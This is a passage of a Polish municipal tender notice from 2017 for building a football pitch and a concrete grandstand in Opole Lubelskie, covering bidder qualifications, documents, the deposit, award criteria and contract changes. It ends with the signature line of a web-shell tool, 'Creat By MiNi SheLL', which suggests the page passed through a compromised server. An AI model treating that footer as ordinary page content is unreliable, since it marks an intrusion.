	minimum 2 roboty budowlane, z których każda obejmowała swym zakresem wykonanie  nawierzchni boiska do piłki nożnej z trawy naturalnej wraz kanalizacją deszczową boiska (drenażem), przy czym przynajmniej 1 robota winna dotyczyć wykonania płyty boiska do gry w piłkę nożną o wymiarach tego boiska minimum 95,0 m x 60,0 m,
	minimum 1 robotę budowlaną polegającą na budowie trybuny o konstrukcji żelbetowej monolitycznej na minimum 400 miejsc siedzących z przynajmniej częściowym zadaszeniem trybuny. 
b)	dysponuje osobami zdolnymi do wykonania zamówienia tj. co najmniej:  
- kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjno budowlanej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów,
- kierownikiem robót posiadającym uprawnienia budowlane w specjalności konstrukcyjno budowlanej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów,
- kierownikiem robót posiadającym uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, 
- kierownikiem robót posiadającym uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych, kanalizacyjnych i wentylacyjnych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;

3)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;

4.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Części VI ust. 3 pkt 2-3 składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające że nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Dokumenty te powinny być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.

5.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymagane w Części VI ust. 3 pkt 2-3  lub w Części VI ust. 4 winny być złożone przez każdego z wykonawców.

6.	Zamawiający żąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w Części VI ust. 3 pkt 2-3  lub w Części VI ust. 4.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />2)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty  - załącznik nr 3  do SIWZ
3)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  załącznik nr 4 do SIWZ
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">- Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert (o której mowa w art. 86 ust. 5 ustawy), samodzielnie (bez odrębnego wezwania ze strony zamawiającego) przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej z innymi wykonawcami składającymi oferty w danym postępowaniu (o której mowa w art. 24 ust. 1 pkt 23 PZP)  wg załącznika Nr 5 do SIWZ. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia;
- Do oferty prosimy załączyć dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę oraz dokumenty potwierdzające posiadanie uprawnień do składania oświadczeń woli w imieniu wykonawcy  (np. dokumenty rejestrowe itp).;
-Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Przystępując do niniejszego postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości 50.000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych brutto).
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr z 2014 r. poz.  1804 oraz z 2015 r.  poz. 978 i 1240).
6)	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
3.	Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:
 	Bank PKO BP S.A.   Nr konta: 76 1020 3235 0000 5002 0007 4336
4.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
5.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urząd Miejski w Opolu Lubelskim, ul. Lubelska 4, 24-300 Opole Lubelskie w Punkcie Obsługi Klienta na parterze Urzędu Miejskiego w Opolu Lubelskim lub dołączyć do oferty.
6.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
7.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres rękojmi</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w postaci aneksu, pod rygorem nieważności takiej zmiany. Zamawiający oprócz przypadków opisanych w art. 144 ustawy przewidział katalog zmian umowy, na które mogą powoływać się strony niniejszej umowy. 
2.	Katalog zmian umowy w zakresie terminu przewidzianego na zakończenie robót. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy  w stosunku do treści oferty na podstawie, której dokonał wyboru Wykonawcy, o którym mowa w umowie w przypadku wystąpienia niżej wymienionych okoliczności w trakcie realizacji przedmiotowej umowy:
a)	siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności;
b)	zmiany będących następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury, w szczególności: przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma  typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp.;
c)	odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez wykonawcę, w tym odmowa udostępnienia terenu przez właścicieli nieruchomości do celów realizacji inwestycji;
d)	kolizji z równolegle prowadzonymi inwestycjami przez Zamawiającego, w tym związanymi z budową dziennego domu pomocy społecznej przy ul. Kolejowej, budową sieci kanalizacji sanitarnej przy ul. Kolejowej wraz z pompownią ścieków na działce nr ew. 56.
e)	innych przyczyn zewnętrznych niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych umową,
f)	w przypadku przedłużającej się procedury przetargowej,
3.	Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
a)	zmiana osób, za pomocą których Wykonawca i Zamawiający realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ np. osób z uprawnieniami budowlanymi;
b)	zmiana osób podanych w ofercie wykonawcy, przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy (zmiana jest możliwa na osoby spełniające wymogi SIWZ, a dla skutecznej zmiany niezbędne jest uzyskanie pisemnej zgody Zamawiającego na zaproponowaną osobę dotyczy osób z uprawnieniami do projektowania);
c)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
d)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami zmiany uzasadnione okolicznościami, o których mowa w art. 3571 §1 Kodeksu cywilnego;
e)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
f)	zmiana harmonogramu rzeczowo finansowego robót;
4.	W przypadku określonym w ust. 3 lit e, zmiany mogą dotyczyć zakresu wykonywanych prac, zmian dokumentacji i zmniejszenia wynagrodzenia o kwoty odpowiadające cenie robót, z których Zamawiający rezygnuje.
5.	 Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy na podstawie art. 142 ust. 5 ustawy Prawo zamówień publicznych. W takim przypadku wysokość wynagrodzenia, o którym mowa w § 2 ust. 2 ulegnie proporcjonalnie zmianie w następujący sposób:
a)	Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian, o których mowa poniżej;
b)	W przypadku zmiany stawki podatku od towarów i usług wartość netto wynagrodzenia wykonawcy nie zmieni się, a określona w aneksie do umowy wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów;
c)	W przypadku zmiany minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz.U. z 2015 r., poz. 2008 z późn. zm.), wynagrodzenie wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu wykonawcy ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących czynności przy realizacji przedmiotu umowy do wysokości aktualnie obowiązującego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych  od kwoty wzrostu minimalnego wynagrodzenia,
d)	W przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, wynagrodzenie wykonawcy ulegnie zmianie o wzrost całkowitego kosztu wykonawcy jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących czynności przy realizacji przedmiotu umowy,
e)	W przypadkach, o których mowa w ppkt b)-d) wprowadzenie zmian wysokości wynagrodzenia wymaga uprzedniego złożenia wniosku dokumentującego wpływ zmian na koszty wykonania zamówienia przez wykonawcę w  terminie od dnia opublikowania przepisów dokonujących tych zmian do 30 dnia od dnia ich wejścia w życie,
f)	nie zawarcie w terminie jednego miesiąca od dnia złożenia wniosku, o którym mowa porozumienia w sprawie odpowiedniej zmiany wynagrodzenia uprawnia strony do rozwiązania umowy z zachowaniem trzymiesięcznego okresu wypowiedzenia, ze skutkiem nie wcześniejszym niż koniec miesiąca. 
6.	Zmiana zatwierdzonego harmonogramu rzeczowo- finansowego wymaga każdorazowo zawarcia aneksu do umowy.
7.	 Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
8.	Każdorazowa zmiana umowy wymagająca zachowania formy aneksu do umowy musi być uzgodniona z Instytucją Współfinansującą (jeżeli dotyczy).
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com